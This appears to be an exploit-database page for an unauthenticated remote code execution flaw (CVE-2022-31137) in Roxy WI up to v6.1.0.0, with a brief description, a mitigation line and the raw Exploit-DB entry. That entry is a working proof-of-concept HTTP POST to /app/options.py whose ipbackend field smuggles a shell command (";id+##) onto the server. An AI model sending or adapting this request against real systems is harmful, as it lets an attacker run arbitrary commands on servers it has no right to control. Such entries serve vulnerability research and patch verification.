header-logo
Suggest Exploit
vendor:
Roxy WI
by:
Iyaad Luqman K
9.8
CVSS
CRITICAL
Unauthenticated Remote Code Execution (RCE)
78
CWE
Product Name: Roxy WI
Affected Version From: Roxy WI <= v6.1.0.0
Affected Version To: Roxy WI <= v6.1.0.0
Patch Exists: NO
Related CWE: CVE-2022-31137
CPE: a:roxy_wi:roxy_wi:6.1.0.0
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu 22.04
2022

Roxy WI v6.1.0.0 – Unauthenticated Remote Code Execution (RCE) via subprocess_execute

The vulnerability allows unauthenticated remote attackers to execute arbitrary code on the target system via the subprocess_execute function in the Roxy WI application. By sending a specially crafted request to the options.py endpoint, an attacker can inject malicious commands that will be executed with the privileges of the application.

Mitigation:

Apply the vendor-provided patch or upgrade to a version that includes a fix for the vulnerability. Additionally, restrict access to the application to trusted users and networks.
Source

Exploit-DB raw data:

# Exploit Title: Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via subprocess_execute
# Exploit Author: Iyaad Luqman K
# Application: Roxy WI <= v6.1.0.0
# Vendor Homepage: https://roxy-wi.org
# Software Link: https://github.com/hap-wi/roxy-wi.git
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-31137


# PoC
POST /app/options.py HTTP/1.1
Host: 192.168.1.44
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: https://192.168.1.44
Referer: https://192.168.1.44/app/login.py
Connection: close

show_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcertalert_consumer=1&serv=127.0.0.1&ipbackend=";id+##&backend_server=127.0.0.1